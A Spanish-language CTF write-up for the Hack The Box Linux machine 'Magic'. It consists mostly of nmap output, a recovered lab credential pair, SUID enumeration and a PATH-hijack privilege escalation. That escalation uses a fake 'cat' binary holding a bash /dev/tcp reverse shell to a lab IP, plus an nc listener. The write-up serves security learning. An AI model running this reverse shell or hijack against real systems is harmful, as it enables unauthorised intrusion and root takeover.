Zona Hacking — Writeups de CTFs y Seguridad Ofensiva

Sistema operativo	Dificultad	Fecha de Lanzamiento	Creador
Linux	Medium	18 Abril 2020	TRX

Escaneo de puertos

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.185
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 21:12 -03
Initiating SYN Stealth Scan at 21:12
Scanning 10.10.10.185 [65535 ports]
Discovered open port 80/tcp on 10.10.10.185
Discovered open port 22/tcp on 10.10.10.185
Completed SYN Stealth Scan at 21:13, 19.81s elapsed (65535 total ports)
Nmap scan report for 10.10.10.185
Host is up, received user-set (0.39s latency).
Scanned at 2025-04-21 21:12:51 -03 for 20s
Not shown: 60463 closed tcp ports (reset), 5070 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.89 seconds
           Raw packets sent: 96944 (4.266MB) | Rcvd: 60961 (2.438MB)

Enumeración de versión y servicio

nmap -sCV -p22,80 -oN servicesScan 10.10.10.185 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 21:13 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:13, 0.00s elapsed
Initiating Ping Scan at 21:13
Scanning 10.10.10.185 [4 ports]
Completed Ping Scan at 21:13, 0.26s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:13
Completed Parallel DNS resolution of 1 host. at 21:13, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:13
Scanning 10.10.10.185 (10.10.10.185) [2 ports]
Discovered open port 22/tcp on 10.10.10.185
Discovered open port 80/tcp on 10.10.10.185
Completed SYN Stealth Scan at 21:13, 0.27s elapsed (2 total ports)
Initiating Service scan at 21:13
Scanning 2 services on 10.10.10.185 (10.10.10.185)
Completed Service scan at 21:13, 6.54s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.185.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:13
Completed NSE at 21:14, 6.94s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 1.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
Nmap scan report for 10.10.10.185 (10.10.10.185)
Host is up, received reset ttl 63 (0.25s latency).
Scanned at 2025-04-21 21:13:49 -03 for 14s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ=
|   256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:14
Completed NSE at 21:14, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.35 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (128B)

Explotación inicial

Magic

Interceptamos la petición con BurpSuite

Magic

Magic Numbers.

Magic

theseus:Th3s3usW4sK1ng

Magic

Escalación de privilegios (root)

Buscamos binarios con el bit SUID activo

find / -perm -4000 2>/dev/null

strings /bin/sysinfo

Magic

Path Hijacking

Modificamos el path

Magic

Creamos un binario que remplace a cat.

bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'

Le damos permisos de ejecución.

chmod +x cat

Nos ponemos en escucha en el puerto 4444 con Netcat.

nc -lnvp 4444

Magic

Magic Magic

Escaneo de puertos

Enumeración de versión y servicio

Explotación inicial

SQLi Login Bypass

Escalación de privilegios (root)

Path Hijacking

Magic